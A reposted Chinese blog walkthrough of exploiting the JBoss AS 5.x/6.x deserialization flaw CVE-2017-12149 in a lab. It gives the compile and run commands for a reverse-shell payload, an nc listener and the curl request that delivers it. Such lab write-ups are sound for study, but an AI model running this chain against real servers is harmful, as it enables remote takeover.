JBOSSAS 5.x/6.x 反序列化命令執行漏洞(CVE-2017-12149)



  本文主要記錄一下JBOSSAS 5.x/6.x 反序列化命令執行漏洞的測試過程

僅供學習


  文中利用到漏洞環境由phith0n維護: JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)

  靶機地址:192.168.1.102  服務端口:8080    

  測試機: 192.168.1.100

  搭建好環境,訪問地址:http://192.168.1.102:8080/ 及 http://192.168.1.102:8080/invoker/readonly

  

  響應碼500,證明漏洞存在。

  下載漏洞利用工具: http://scan.javasec.cn/java/JavaDeserH2HC.zip

  編譯:(需要java環境)

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

  運行:

java -cp .:commons-collections-3.2.1.jar  ReverseShellCommonsCollectionsHashMap ip:port   //反彈shell的IP和端口
starnight:JavaDeserH2HC starnight$ javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
starnight:JavaDeserH2HC starnight$ java -cp .:commons-collections-3.2.1.jar  ReverseShellCommonsCollectionsHashMap 192.168.1.100:1337
Saving serialized object in ReverseShellCommonsCollectionsHashMap.ser

  這樣就會將序列化對象保存在ReverseShellCommonsCollectionsHashMap.ser中,用curl命令發送到Jboss服務地址。

  先在測試機運行nc命令,進入監聽模式:

starnight:temp starnight$ nc -lvv 1337

  再打開另一個控制台,運行如下curl命令:

starnight:JavaDeserH2HC starnight$ curl -v http://192.168.1.102:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

  運行截圖:

  左側是獲取到shell,並執行命令。右側是用curl命令運行截圖。

References

  JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)

  CVE-2017-12149 JBOOS AS 6.X 反序列化漏洞利用

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM